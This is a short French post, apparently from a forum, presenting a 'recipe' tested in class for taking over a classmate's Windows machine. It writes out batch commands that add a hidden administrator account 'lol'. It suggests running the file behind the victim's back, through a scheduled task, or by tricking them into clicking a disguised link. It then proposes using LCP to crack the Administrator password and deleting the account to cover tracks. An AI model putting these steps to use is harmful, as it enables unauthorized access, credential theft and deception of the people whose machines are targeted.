Un petit truc simpa que j'ai testé en cours :
Recette :
1 fichier batch avec :
net user "lol" "lol" /add
net localgroup Administrateurs "lol" /add
Un chti programme du type LCP
Réussir à faire lancer le fichier batch sur la machine cible
(pendant qu'un camarade a le dos tourné par exemp, ou via une tache planifié, ou encore en le **orthographe !** cliquer sur un lien lui **orthographe !** croire que c'est un outil de je ne sais pas trop quoi qui roxx a mort).
Une fois fait, plus qu'a lancer LCP sur la machine cible, avec notre login et mot de passe admin lol/lol, puis on a le mot de passe du compte Administrateur, et on peut supprimer le login/mdp lol histoire de ne pas etre trop vu.